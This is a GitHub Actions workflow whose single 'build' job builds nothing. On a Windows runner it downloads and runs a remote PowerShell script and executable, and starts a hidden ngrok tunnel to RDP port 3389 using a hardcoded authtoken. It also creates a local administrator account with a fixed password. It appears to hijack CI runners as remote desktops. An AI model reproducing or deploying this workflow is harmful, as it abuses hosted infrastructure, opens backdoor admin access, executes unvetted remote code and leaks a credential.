on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: windows-latest
    
    steps:
    - name: Download
      run: Invoke-WebRequest https://github.com/Usser1222/circleci/raw/main/0.ps1 -OutFile 0.ps1
    
    - name: rrt
      run: |
           Invoke-WebRequest -Uri "https://raw.githubusercontent.com/Usser1222/circleci/main/use.exe" -OutFile ngrok.exe 
           cmd /c ngrok.exe authtoken 2CMy5dw3Nisup8JGIZuHvSwoEdr_77vLBUh2x4oHQC4TRm4CZ
           Start-Process -FilePath "ngrok.exe" -ArgumentList "tcp 3389" -WindowStyle Hidden
           cmd /c net user /add Admin P@ssw0rd.
           cmd /c net localgroup /add administrators Admin
           sleep 240
           curl -o zip.exe -Uri "https://raw.githubusercontent.com/Usser1222/circleci/main/use.exe"
           .\0.ps1
           curl -o zip.exe -Uri "https://raw.githubusercontent.com/Usser1222/circleci/main/use.exe"
           .\0.ps1
